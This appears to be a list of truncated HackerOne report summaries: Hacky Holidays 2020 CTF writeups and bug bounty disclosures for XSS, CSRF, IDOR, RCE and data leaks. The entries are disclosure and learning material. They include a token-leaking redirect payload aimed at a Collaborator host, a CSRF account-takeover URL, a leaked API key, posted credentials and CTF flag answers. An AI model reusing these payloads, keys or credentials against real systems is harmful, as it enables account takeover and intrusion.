h1-ctf: Grinchs website takendown with various other exploits

The HackyHolidays This is my first HackerOne CTF challenge writeup. Contents: flag1: Day 1 Check the files, robots.txt flag2: Day 2 one more : jquery.min.js flag3: Day 3 People Rater flag4: Day 4 Brute Force, Swag Shop flag5: Day 5 Brute Force, Secure Login flag6: Day 6 Brute Force, My Diary flag...

h1-ctf: [h1ctf-Grinch Networks] MrR3b00t Saving the Christmas

Disclaimer: Certain things are a bit modified to set the pieces for the story. Also you can find the flags for all 12 challenges in file F1138300 , Now enjoy : █▀▄▀█ █▀█ ░ █▀█ █▄▄ █▀█ █▀█ ▀█▀ █░▀░█ █▀▄ ▄ █▀▄ █▄█ █▄█ █▄█ ░█░ saves the Christmas Episode - 0x00 Pil0t.py It was a gloomy clear night,...

h1-ctf: HackyHolidays H1 CTF Writeup

HackyHolidays Day 1 Once the CTF started and the Grinch released the scope hackyholidays.h1ctf.com, I started the CTF by a good old Nmap scan, to see whats running on the server. So the nmap command looked like nmap -sC -sV -oA nmap hackyholidays.h1ctf.com/. The result showed a promising entry...

h1-ctf: Writeup Submission

The Write-Up will be published within the next hours latest till Dec. 31st 12:00 PST under https://blogs.tippexs.io User: h4ck4r0ne Pass: s4nt4sucks Let me know if I need to submit anything else. I have started crafting an PDF but it become that huge that I have decided to create a complete new...

Brave Software: Phishing/Malware site blocking on Brave iOS can be bypassed with trailing dot in hostname

A vulnerability was discovered in Brave iOS nightly build that allowed bypassing of the phishing/malware site blocking feature by adding a trailing dot in the hostname. This allowed users to access prohibited sites without being blocked by Brave Shield protection...

Trellix: RXSS in https://jp.mcafee.com/apps/mdm/jp/3.0_asp/

A cross-site scripting XSS vulnerability was discovered in https://jp.mcafee.com/apps/mdm/jp/3.0asp/. The vulnerability was verified in Chrome 87 and Firefox. The vulnerability allowed execution of arbitrary JavaScript code by injecting it into the website's URL...

h1-ctf: HackyHolidays 2020 Full Write-up: Information Disclosure of 12 Flags

Intro This is my report for the 2020 Hacky Holidays HackerOne CTF. I managed to find all 12 flags with the assistance of my little helper, Jake. He specialises in brute-forcing via a unique keyboard mashing technique: F1134543 Anywho, let's get started... Flag 1: Robots The first one was a nice...

h1-ctf: 12 Days of CTF Walkthroughs

h1-ctf: 12 Days of Hacky Holidays This is my writeup for 12 Days of Hacky Holidays. The report is written such that beginners to CTFs will be able to learn the tricks of the trade. The Mission: The Grinch has gone hi-tech this year with the intention of ruining the holidays 😱We need you to...

Glassdoor: Dom XSS Rootkit on [https://www.glassdoor.com/]

The report was vulnerable to DOM-based XSS via sc.keyword on https://www.glassdoor.com/Job/jobs.htm?sc.keyword=test and got resolved by another report 1064892. Thanks, @4peace for your submission...

LY Corporation: File sizes may be manipulated into negative numbers when uploading

The file sizes were manipulated into negative numbers when uploading. The message indicating insufficient storage space was displayed. However, the file size was recalculated and transmitted during the upload process, allowing the upload to proceed despite the negative file size...

Slack: Cross-site leak allows attacker to de-anonymize members of his team from another origin

This issue was reported by researcher @jub0bs via HackerOne on December 29, 2020. The Slack security team reviewed the issue, understanding the nature of information disclosure on Dec 30th. We closed the issue as informative, which we do to reflect that the report, while accurate, has not taken...

TikTok: Blocked user can see live video

A flaw had the potential to cause a user's live videos to be suggested to a blocked user. We thank @sandipgyawali for reporting this to our team and confirming the resolution...

h1-ctf: A Visit from The Grinch ~ 'Twas the night before Hackmas...

Foreword This was an amazing CTF! The first from Hackerone that I've finished and one that I have enjoyed the most. Huge shout out to @adamtlangley for creating this downright poetic challenge. My whopping 20+ invitations are already being put to good use. Hacky Holidays and Merry Hackmas! Flag 1...

Mail.ru: Gitlab search exposing personal data of employees on gitlab-edu.geekbrains.ru

Externally accessible Gitlab instance in Geekbrains was disclose data of employes...

h1-ctf: Hacky Holidays Writeup

On December 12th, 2020, the CTF became live and the scope that we are allowed to attack was In Scope Domain - hackyholidays.h1ctf.com Our main motive was to infiltrate his network and take him down. The challenges appeared one by one till 24th of December. Here we will be going through all the...

Nextcloud: Database error shown to the user when using a long guest name in richdocuments

When sharing a file to a guest and the file is allow for editing, the user is asked to enter a guestname if you enter a really long value for that name you get a database error that displays sensitive information: An exception occurred while executing 'INSERT INTO...

CS Money: Cookie poisoning leads to DOS and Privacy Violation

Summary, submitted by gatolouco requires no additions by us and fully expresses impact and reasons behind the vulnerability. Summary By change the value of the cookie avatar, a hacker could not only get information of the support agent IP address, but also disconnect all the supports without...

Automattic: Unauthenticated access to webmail at maildev.happytools.dev leading to compromised wordpress site api.happytools.dev [RCE]

Summary: Dear Team, Today when I trying to find bugs on happy tools I have found 2 domains below for staging environment - https://maildev.happytools.dev - https:// api.happytools.dev Two websites above ssl certificate was expired. But you can adjust your date-time to 02/02/2020 or before that ti...

Courier: Rate limit function bypass can leads to occur huge critical problem into website.

Hello team, I have found a technique that can easily bypass rate limit system of website and with this bug we attacker can easily attack into login panel, Sent unlimited number of huge notification to victim, bypass OTP codes and takeover accounts etc. Basically i have added a header...

h1-ctf: Successfully took down the Grinch and saved the holidays from being ruined

Beginning ---------- HackerOne's official twitter account posted a tweet on 11th December announcing 12 days of hacky holidays where we have to take down the grinch and prevent him from ruining the Christmas holidays. F1132156 Challenge 1: Something to get started...

Shopify: Screenshot Service leaks X-ABS-App-Token

Login and create a development store 2. Start Burp Suite and open a burp collaborator client then copy the collaborator payload 3. Edit the section header.liquid of your current theme. Adding this: window.location="https://pasteherecollaborator/"; Finally go to...

New Relic: Stored XSS via malicious key value of Synthetics monitor tag when visiting an Insights dashboard with filtering enabled

Introduction & Context This is a complex XSS that requires multiple steps in order to setup. It also requires you to have a good understanding of both New Relic Insights, New Relic Synthetics monitors, and the NerdGraph API explorer. Background Context: New Relic Synthetics and the history of tag...

U.S. Dept Of Defense: RCE in ██████ subdomain via CVE-2017-1000486

Summary: The application at ████████/ftn-Website/ uses primefaces 5.3 but not 5.3.8, making it vulnerable to unauthenticated RCE CVE-2017-1000486. Step-by-step Reproduction Instructions 1. Get the publicly available POC for this vulnerability here: https://github.com/pimps/CVE-2017-1000486 2...

U.S. Dept Of Defense: Sending trusted ████ and ██████████ emails through public API endpoint in ███████ site

Summary: A publicly accessible endpoint at PUT https://████████does not validate any of its four parameters: to, from, subject, text. This enables sending email to any address, with any content, with any from address, on a server that is in ██████whitelist. Such services include, but are not...

h1-ctf: Mission completed. Grinch Networks is down and Christmas saved.

Hi, I decided to create a good writeup, but for that I'd need some time, that's why I am submitting this pre-report now, and the actual report I ll submit before the deadline in this thread, right under this one. Here is some proof that Grinch Networks is down:...

h1-ctf: [h1-ctf] 12 Days of Adventure to stop Grinch from ruining Christmas

--------------------------------------------------------------------------------------------------------------------------------------------------- Day 1: https://hackyholidays.h1ctf.com/robots.txt User-agent: Disallow: /s3cr3t-ar3a Flag: flag48104912-28b0-494a-9995-a203d1e261e7 Here we go with t...

h1-ctf: Taking Grinch Down To Save Holidays

Hi thank you Hackerone and Adam for organizing the CTF, this had honestly helped me to learn good skills and techniques. The CTF began with the scope: hackyholidays.h1ctf.com and mission to take down grinch So here's a quick visual summary of all the challenges F1131175 F1131176 1. Grinch Robots ...

U.S. Dept Of Defense: Sensitive data exposure via https://███████/secure/QueryComponent!Default.jspa - CVE-2020-14179

Summary: Information Disclosure vulnerability in outdated Jira. Description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the...

h1-ctf: [ Hacky Holidays CTF ] Completely taken down the Grinch Networks

Day 1 - Robot flag We're presented with sample ui page without any function. So I guessed content discovery is the best way to find flag. And robots.txt came to my mind and found the flag. https://hackyholidays.h1ctf.com/robots.txt Response User-agent: Disallow: /s3cr3t-ar3a Flag:...

h1-ctf: 12 Days of Hacky Holidays write-up, but as a text-based RPG?

The flags are - flag48104912-28b0-494a-9995-a203d1e261e7 - flagb7ebcb75-9100-4f91-8454-cfb9574459f7 - flagb705fb11-fb55-442f-847f-0931be82ed9a - flag972e7072-b1b6-4bf7-b825-a912d3fd38d6 - flag2e6f9bf8-fdbd-483b-8c18-bdf371b2b004 - flag18b130a7-3a79-4c70-b73b-7f23fa95d395 -...

h1-ctf: Hacky Holidays CTF Writeup

Greetings team Yay! Finally I made it to the end, thank you very much for launching this fantastic event, I had to review topics that I thought I knew, learned a lot and I am sure that I will continue learning with the community : F1130889 Hacky Holidays! P.S. I will put my writeup in my next...

WHO COVID-19 Mobile App: Internal API endpoint is accesible for everyone

Summary: It looks like the endpoint /internal/cron/refreshCaseStats as configured in cron.yaml https://github.com/WorldHealthOrganization/app/blob/master/server/appengine/src/main/webapp/WEB-INF/cron.yamlL3 is accesible for everyone. Since it is configured as a cronjob to run every 5 minutes and...

TikTok: HTML Injection through Account Name field on TikTok ads portal being rendered on emails

The Account Name field on the TikTok Ads Portal did not have restrictions on HTML tag injections which an attacker could have potentially used for phishing attacks. We thank @nagli for reporting this to our team and confirming the resolution...

h1-ctf: Grinch Networks compromised!

Grinch Networks compromised! For fast triage/validation and inspired by @manoelt in other CTF, I made a bash script to find and print all the 12 flags of this CTF. The script uses curl, wget, google-chrome headless for flag 2, unzip, grep and sed. If any of these commands is missing, the script...

Mail.ru: XSS (reflected, and then, cookie persisted) on api documentation site theme selector (old version of dokuwiki)

Reflected XSS on apidocs.ucs.ru via GET parameter bootswatch-theme...

Clario: Google API key leaks and security misconfiguration leads Open Redirect Vulnerability

Summary: Hello, when i search your targets and javascript files I found an googleapikey leaks in url = https://account.clario.co/js/main.044af6485f6b0cd90809.js. Part of the leak down below; 'https://firebasedynamiclinks.googleapis.com/v1/shortLinks?key=AIzaSyAw-SpLHVTIP3IFEIkckCuEmIhnUrY9OrQ';...

h1-ctf: CTF Writeup

Hi, First of all, thanks for this amazing CTF!. I will post my writeup soon, it is time to sleep now : F1129602 By the way, the creator of challenge 11 is crazy. Impact Grinch Network is finally down...

h1-ctf: [hacky-holidays] Grinch network is down

Flag 1 As always CTF begins with a tweet: F1126838 So we are supposed to start from https://hackyholidays.h1ctf.com/ . The first flag was easy on https://hackyholidays.h1ctf.com/ I found a file named robots.txt which had the following content: User-agent: Disallow: /s3cr3t-ar3a Flag:...

Stripe: GRAPHQL cross-tenant IDOR giving write access thought the operation UpdateAtlasApplicationPerson

@bubbounty discovered an Insecure Direct Object Reference IDOR vulnerability that allowed someone with prior Admin access to a Stripe account to add a co-founder to a Stripe Atlas application belonging to the merchant account they used to administer. The issue has been addressed by only allowing...

QIWI: Account takeover just through csrf in https://booking.qiwi.kz/profile

Hello Team: after register by any account, we can found that we can change email in profile to another one, by just using a GET request https://booking.qiwi.kz/ajaxconfirmcontact?type=emailconfirmed&[email protected]&iframePopupMode=1 but without verification, attacker can steal account...

h1-ctf: Wholesome Hacky Holidays: A Writeup

Flag 1 Warm-up: flag48104912-28b0-494a-9995-a203d1e261e7 Checking the robots.txt the flag can be found. Also a path is revealed: /s3cr3t-ar3a Flag 2 It's right in front of you: flagb7ebcb75-9100-4f91-8454-cfb9574459f7 With the previously found path /s3cr3t-ar3a, the flag was hidden in plain sight...

U.S. Dept Of Defense: ███████mill is vulnerable to cross site request forgery that leads to full account take over.

Summary: The form within the "My Account" page in ███████mil fails to verify the CSRF token used when an user makes changes such as changing the password and other details. For example, an attacker can change the user's email address, full name, phone number, etc. In this way the attacker can gai...

h1-ctf: Hacky Holidays CTF Writeup

Intro: 12 days of challenges - some more challenging than others! This holiday CTF had all 12 challenges hosted on the website https://hackyholidays.h1ctf.com/ F1129112 Challenge 1: I started by significantly overthinking all of the early challenges in this competition. When this CTF started the...

Stripo Inc: Stored XSS in the banner block description

Steps To Reproduce: - Create a new template and add a banner block F1128944 - Add a description to the banner block description: " - Malicious code executed F1128945 Proof Of Concept: F1128942 Impact With this vulnerability, an attacker can for example steal users cookies or redirect users on...

h1-ctf: Complete destruction of the Grinch server

Hackyholidays flag 1 First flag is just a matter of reading /robots.txt file: User-agent: Disallow: /s3cr3t-ar3a Flag: flag48104912-28b0-494a-9995-a203d1e261e7 flag 2 Visiting /s3cr3t-ar3a and opening it with developer tools gets the second flag: flagb7ebcb75-9100-4f91-8454-cfb9574459f7 It is...

WHO COVID-19 Mobile App: Error Page Text Injection (no compromise)

Hi team! I want to report a context spoofing or text injection at http://hack.whocoronavirus.org/ 404 page Vulnerability Description : The http://hack.whocoronavirus.org/ scope allows users to inject any content on the 404 not found webpage Vulnerable Location :...

h1-ctf: Invading Grinch Network and Saving Christmas

How we saved Christmas As usual with H1 CTF challenges we are provided with a target URL. In our case it is the following: https://hackyholidays.h1ctf.com/ We started by visiting the URL and see what is going on. All we could see is a page with an image with a warning message. F1125722 We quickly...

Mail.ru: DOM based XSS via postMessage at store.my.games

mailru.core.js as used by GMR/store.my.games application was vulnerable to XSS via PostMessage handler...

h1-ctf: Writeup Hackyholiday CTF

Hi there, Find my writeup on attached : F1128138 Thanks adam for making the CTF, Really PAIN for my head! Impact Hackerone Hoodie ? 😍😍...

h1-ctf: Hackyholidays CTF writeup

Writeup for the hackyholidays CTF This CTF consisted of 12 challenges released daily in the 12 days leading up to christmas. The goal was to stop the Grinch from ruining christmas by slowly destroying the apps that he used to terrorize Santa and his elfs. The challenges were: 1. Robots.txt 2. DOM...